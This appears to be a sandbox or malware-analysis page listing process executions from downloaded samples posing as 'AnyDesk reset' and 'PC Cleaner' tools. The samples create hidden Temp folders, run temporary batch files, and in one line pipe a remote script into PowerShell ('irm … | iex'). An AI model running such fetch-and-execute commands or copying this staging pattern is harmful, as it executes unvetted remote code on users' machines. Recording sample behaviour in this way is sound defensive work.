C:\WINDOWS\system32\cmd.exe C:\WINDOWS\system32\cmd.exe /c C:\Users\Iuofgedh\AppData\Local\Temp\ytmp\tmp16475.bat "c:\users\user\downloads\4184b80d3a6987c06769d661599d11f38bf7c7ac_0000099914"
C:\WINDOWS\system32\chcp.com chcp 65001
C:\WINDOWS\system32\cmd.exe C:\WINDOWS\system32\cmd.exe /c title Reset Anydesk By @Joshua
C:\WINDOWS\system32\cmd.exe C:\WINDOWS\system32\cmd.exe /c if not exist "C:\Users\Soqwiyqn\AppData\Local\Temp\myfiles" mkdir "C:\Users\Soqwiyqn\AppData\Local\Temp\myfiles"
C:\WINDOWS\system32\cmd.exe C:\WINDOWS\system32\cmd.exe /c if not exist "C:\Users\Soqwiyqn\AppData\Local\Temp\wtmpd" mkdir "C:\Users\Soqwiyqn\AppData\Local\Temp\wtmpd"
C:\WINDOWS\system32\cmd.exe C:\WINDOWS\system32\cmd.exe /c attrib +h C:\Users\Soqwiyqn\AppData\Local\Temp\wtmpd
C:\WINDOWS\system32\attrib.exe attrib +h C:\Users\Soqwiyqn\AppData\Local\Temp\wtmpd
C:\WINDOWS\system32\cmd.exe C:\WINDOWS\system32\cmd.exe /c echo:0>C:\Users\Soqwiyqn\AppData\Local\Temp\i6.t
C:\WINDOWS\system32\cmd.exe C:\WINDOWS\system32\cmd.exe /c C:\Users\Soqwiyqn\AppData\Local\Temp\i6.bat
C:\WINDOWS\system32\cmd.exe C:\WINDOWS\system32\cmd.exe /c title PC Cleaner
C:\WINDOWS\system32\cmd.exe C:\WINDOWS\system32\cmd.exe /c if not exist "C:\Users\Miwblncn\AppData\Local\Temp\myfiles" mkdir "C:\Users\Miwblncn\AppData\Local\Temp\myfiles"
C:\WINDOWS\system32\cmd.exe C:\WINDOWS\system32\cmd.exe /c if not exist "C:\Users\Miwblncn\AppData\Local\Temp\wtmpd" mkdir "C:\Users\Miwblncn\AppData\Local\Temp\wtmpd"
C:\WINDOWS\system32\cmd.exe C:\WINDOWS\system32\cmd.exe /c attrib +h C:\Users\Miwblncn\AppData\Local\Temp\wtmpd
C:\WINDOWS\system32\attrib.exe attrib +h C:\Users\Miwblncn\AppData\Local\Temp\wtmpd
C:\WINDOWS\system32\cmd.exe C:\WINDOWS\system32\cmd.exe /c echo:0>C:\Users\Miwblncn\AppData\Local\Temp\i6.t
C:\WINDOWS\system32\cmd.exe C:\WINDOWS\system32\cmd.exe /c C:\Users\Miwblncn\AppData\Local\Temp\i6.bat
C:\WINDOWS\system32\cmd.exe C:\WINDOWS\system32\cmd.exe /c mode con:cols=0080 lines=0025
C:\WINDOWS\system32\mode.com mode con:cols=0080 lines=0025
C:\WINDOWS\system32\cmd.exe C:\WINDOWS\system32\cmd.exe /c if not exist "C:\Users\Oisfyhie\AppData\Local\Temp\myfiles" mkdir "C:\Users\Oisfyhie\AppData\Local\Temp\myfiles"
C:\WINDOWS\system32\cmd.exe C:\WINDOWS\system32\cmd.exe /c if not exist "C:\Users\Oisfyhie\AppData\Local\Temp\wtmpd" mkdir "C:\Users\Oisfyhie\AppData\Local\Temp\wtmpd"
C:\WINDOWS\system32\cmd.exe C:\WINDOWS\system32\cmd.exe /c attrib +h C:\Users\Oisfyhie\AppData\Local\Temp\wtmpd
C:\WINDOWS\system32\attrib.exe attrib +h C:\Users\Oisfyhie\AppData\Local\Temp\wtmpd
C:\WINDOWS\system32\cmd.exe C:\WINDOWS\system32\cmd.exe /c echo:0>C:\Users\Oisfyhie\AppData\Local\Temp\i6.t
C:\WINDOWS\system32\cmd.exe C:\WINDOWS\system32\cmd.exe /c C:\Users\Oisfyhie\AppData\Local\Temp\i6.bat
C:\WINDOWS\system32\cmd.exe C:\WINDOWS\system32\cmd.exe /c if not exist "C:\Users\Yluqohqg\AppData\Local\Temp\myfiles" mkdir "C:\Users\Yluqohqg\AppData\Local\Temp\myfiles"
C:\WINDOWS\system32\cmd.exe C:\WINDOWS\system32\cmd.exe /c if not exist "C:\Users\Yluqohqg\AppData\Local\Temp\wtmpd" mkdir "C:\Users\Yluqohqg\AppData\Local\Temp\wtmpd"
C:\WINDOWS\system32\cmd.exe C:\WINDOWS\system32\cmd.exe /c attrib +h C:\Users\Yluqohqg\AppData\Local\Temp\wtmpd
C:\WINDOWS\system32\attrib.exe attrib +h C:\Users\Yluqohqg\AppData\Local\Temp\wtmpd
C:\WINDOWS\system32\cmd.exe C:\WINDOWS\system32\cmd.exe /c echo:0>C:\Users\Yluqohqg\AppData\Local\Temp\i6.t
C:\WINDOWS\system32\cmd.exe C:\WINDOWS\system32\cmd.exe /c C:\Users\Yluqohqg\AppData\Local\Temp\i6.bat
C:\WINDOWS\system32\cmd.exe C:\WINDOWS\system32\cmd.exe /c if not exist "C:\Users\Zycgagxw\AppData\Local\Temp\afolder" mkdir "C:\Users\Zycgagxw\AppData\Local\Temp\afolder"
C:\WINDOWS\system32\cmd.exe C:\WINDOWS\system32\cmd.exe /c if not exist "C:\Users\Zycgagxw\AppData\Local\Temp\ytmp" mkdir "C:\Users\Zycgagxw\AppData\Local\Temp\ytmp"
C:\WINDOWS\system32\cmd.exe C:\WINDOWS\system32\cmd.exe /c attrib +h C:\Users\Zycgagxw\AppData\Local\Temp\ytmp
C:\WINDOWS\system32\attrib.exe attrib +h C:\Users\Zycgagxw\AppData\Local\Temp\ytmp
C:\WINDOWS\system32\cmd.exe C:\WINDOWS\system32\cmd.exe /c if exist "C:\Users\Zycgagxw\AppData\Local\Temp\ytmp\tmp98875.bat" del "C:\Users\Zycgagxw\AppData\Local\Temp\ytmp\tmp98875.bat"
C:\WINDOWS\system32\cmd.exe C:\WINDOWS\system32\cmd.exe /c if exist "C:\Users\Zycgagxw\AppData\Local\Temp\ytmp\tmp98875.exe" del "C:\Users\Zycgagxw\AppData\Local\Temp\ytmp\tmp98875.exe"
C:\WINDOWS\system32\cmd.exe C:\WINDOWS\system32\cmd.exe /c C:\Users\Zycgagxw\AppData\Local\Temp\ytmp\tmp98875.bat "c:\users\user\downloads\606b699b98ef09214acf46535fb66dad4d56a78e_0000106689"
C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "irm https://massgrave.dev/get | iex"
C:\WINDOWS\system32\cmd.exe C:\WINDOWS\system32\cmd.exe /c if not exist "C:\Users\Gzgrrcjv\AppData\Local\Temp\afolder" mkdir "C:\Users\Gzgrrcjv\AppData\Local\Temp\afolder"
C:\WINDOWS\system32\cmd.exe C:\WINDOWS\system32\cmd.exe /c if not exist "C:\Users\Gzgrrcjv\AppData\Local\Temp\ztmp" mkdir "C:\Users\Gzgrrcjv\AppData\Local\Temp\ztmp"
C:\WINDOWS\system32\cmd.exe C:\WINDOWS\system32\cmd.exe /c attrib +h C:\Users\Gzgrrcjv\AppData\Local\Temp\ztmp
C:\WINDOWS\system32\attrib.exe attrib +h C:\Users\Gzgrrcjv\AppData\Local\Temp\ztmp
C:\WINDOWS\system32\cmd.exe C:\WINDOWS\system32\cmd.exe /c if exist "C:\Users\Gzgrrcjv\AppData\Local\Temp\ztmp\tmp5694sers\user\downloads\.bat" del "C:\Users\Gzgrrcjv\AppData\Local\Temp\ztmp\tmp5694sers\user\downloads\.bat"
C:\WINDOWS\system32\cmd.exe C:\WINDOWS\system32\cmd.exe /c if exist "C:\Users\Gzgrrcjv\AppData\Local\Temp\ztmp\tmp5694sers\user\downloads\.exe" del "C:\Users\Gzgrrcjv\AppData\Local\Temp\ztmp\tmp5694sers\user\downloads\.exe"
C:\WINDOWS\system32\cmd.exe C:\WINDOWS\system32\cmd.exe /c C:\Users\Gzgrrcjv\AppData\Local\Temp\ztmp\tmp5694sers\user\downloads\.bat "c:\users\user\downloads\8c3378d1c82acfcb16e1b7f073b1034b376046a6_0000082010"
C:\WINDOWS\system32\cmd.exe C:\WINDOWS\system32\cmd.exe /c if not exist "C:\Users\Hrdlycmd\AppData\Local\Temp\afolder" mkdir "C:\Users\Hrdlycmd\AppData\Local\Temp\afolder"
C:\WINDOWS\system32\cmd.exe C:\WINDOWS\system32\cmd.exe /c if not exist "C:\Users\Hrdlycmd\AppData\Local\Temp\ztmp" mkdir "C:\Users\Hrdlycmd\AppData\Local\Temp\ztmp"
C:\WINDOWS\system32\cmd.exe C:\WINDOWS\system32\cmd.exe /c attrib +h C:\Users\Hrdlycmd\AppData\Local\Temp\ztmp
C:\WINDOWS\system32\attrib.exe attrib +h C:\Users\Hrdlycmd\AppData\Local\Temp\ztmp
C:\WINDOWS\system32\cmd.exe C:\WINDOWS\system32\cmd.exe /c if exist "C:\Users\Hrdlycmd\AppData\Local\Temp\ztmp\tmp9947sers\user\downloads\.bat" del "C:\Users\Hrdlycmd\AppData\Local\Temp\ztmp\tmp9947sers\user\downloads\.bat"
C:\WINDOWS\system32\cmd.exe C:\WINDOWS\system32\cmd.exe /c if exist "C:\Users\Hrdlycmd\AppData\Local\Temp\ztmp\tmp9947sers\user\downloads\.exe" del "C:\Users\Hrdlycmd\AppData\Local\Temp\ztmp\tmp9947sers\user\downloads\.exe"
C:\WINDOWS\system32\cmd.exe C:\WINDOWS\system32\cmd.exe /c C:\Users\Hrdlycmd\AppData\Local\Temp\ztmp\tmp9947sers\user\downloads\.bat "c:\users\user\downloads\191e45ad5a06e15b4b152c63f94717ab67e06119_0000079155"
C:\WINDOWS\system32\cmd.exe C:\WINDOWS\system32\cmd.exe /c if not exist "C:\Users\Vzykwaqs\AppData\Local\Temp\afolder" mkdir "C:\Users\Vzykwaqs\AppData\Local\Temp\afolder"
C:\WINDOWS\system32\cmd.exe C:\WINDOWS\system32\cmd.exe /c if not exist "C:\Users\Vzykwaqs\AppData\Local\Temp\ztmp" mkdir "C:\Users\Vzykwaqs\AppData\Local\Temp\ztmp"
C:\WINDOWS\system32\cmd.exe C:\WINDOWS\system32\cmd.exe /c attrib +h C:\Users\Vzykwaqs\AppData\Local\Temp\ztmp
C:\WINDOWS\system32\attrib.exe attrib +h C:\Users\Vzykwaqs\AppData\Local\Temp\ztmp
C:\WINDOWS\system32\cmd.exe C:\WINDOWS\system32\cmd.exe /c if exist "C:\Users\Vzykwaqs\AppData\Local\Temp\ztmp\tmp4517sers\user\downloads\.bat" del "C:\Users\Vzykwaqs\AppData\Local\Temp\ztmp\tmp4517sers\user\downloads\.bat"
C:\WINDOWS\system32\cmd.exe C:\WINDOWS\system32\cmd.exe /c if exist "C:\Users\Vzykwaqs\AppData\Local\Temp\ztmp\tmp4517sers\user\downloads\.exe" del "C:\Users\Vzykwaqs\AppData\Local\Temp\ztmp\tmp4517sers\user\downloads\.exe"
C:\WINDOWS\system32\cmd.exe C:\WINDOWS\system32\cmd.exe /c C:\Users\Vzykwaqs\AppData\Local\Temp\ztmp\tmp4517sers\user\downloads\.bat "c:\users\user\downloads\f8a5f64d6a75c8a4ca7c1aa9e041359c667a897d_0000069827"
C:\WINDOWS\system32\cmd.exe C:\WINDOWS\system32\cmd.exe /c if not exist "C:\Users\Frpqjqfa\AppData\Local\Temp\myfiles" mkdir "C:\Users\Frpqjqfa\AppData\Local\Temp\myfiles"
C:\WINDOWS\system32\cmd.exe C:\WINDOWS\system32\cmd.exe /c if not exist "C:\Users\Frpqjqfa\AppData\Local\Temp\wtmpd" mkdir "C:\Users\Frpqjqfa\AppData\Local\Temp\wtmpd"
C:\WINDOWS\system32\cmd.exe C:\WINDOWS\system32\cmd.exe /c attrib +h C:\Users\Frpqjqfa\AppData\Local\Temp\wtmpd
C:\WINDOWS\system32\attrib.exe attrib +h C:\Users\Frpqjqfa\AppData\Local\Temp\wtmpd
C:\WINDOWS\system32\cmd.exe C:\WINDOWS\system32\cmd.exe /c echo:0>C:\Users\Frpqjqfa\AppData\Local\Temp\i6.t
C:\WINDOWS\system32\cmd.exe C:\WINDOWS\system32\cmd.exe /c C:\Users\Frpqjqfa\AppData\Local\Temp\i6.bat
C:\WINDOWS\system32\cmd.exe C:\WINDOWS\system32\cmd.exe /c if not exist "C:\Users\Incwqkjp\AppData\Local\Temp\afolder" mkdir "C:\Users\Incwqkjp\AppData\Local\Temp\afolder"
C:\WINDOWS\system32\cmd.exe C:\WINDOWS\system32\cmd.exe /c if not exist "C:\Users\Incwqkjp\AppData\Local\Temp\ztmp" mkdir "C:\Users\Incwqkjp\AppData\Local\Temp\ztmp"
C:\WINDOWS\system32\cmd.exe C:\WINDOWS\system32\cmd.exe /c attrib +h C:\Users\Incwqkjp\AppData\Local\Temp\ztmp
C:\WINDOWS\system32\attrib.exe attrib +h C:\Users\Incwqkjp\AppData\Local\Temp\ztmp
C:\WINDOWS\system32\cmd.exe C:\WINDOWS\system32\cmd.exe /c title AnyReset 1.5
C:\WINDOWS\system32\cmd.exe C:\WINDOWS\system32\cmd.exe /c if not exist "C:\Users\Fkwlrvwl\AppData\Local\Temp\myfiles" mkdir "C:\Users\Fkwlrvwl\AppData\Local\Temp\myfiles"
C:\WINDOWS\system32\cmd.exe C:\WINDOWS\system32\cmd.exe /c if not exist "C:\Users\Fkwlrvwl\AppData\Local\Temp\wtmpd" mkdir "C:\Users\Fkwlrvwl\AppData\Local\Temp\wtmpd"
C:\WINDOWS\system32\cmd.exe C:\WINDOWS\system32\cmd.exe /c attrib +h C:\Users\Fkwlrvwl\AppData\Local\Temp\wtmpd
C:\WINDOWS\system32\attrib.exe attrib +h C:\Users\Fkwlrvwl\AppData\Local\Temp\wtmpd
C:\WINDOWS\system32\cmd.exe C:\WINDOWS\system32\cmd.exe /c echo:0>C:\Users\Fkwlrvwl\AppData\Local\Temp\i6.t

192 additional execution are not displayed above.

Trending

Most Viewed

Loading...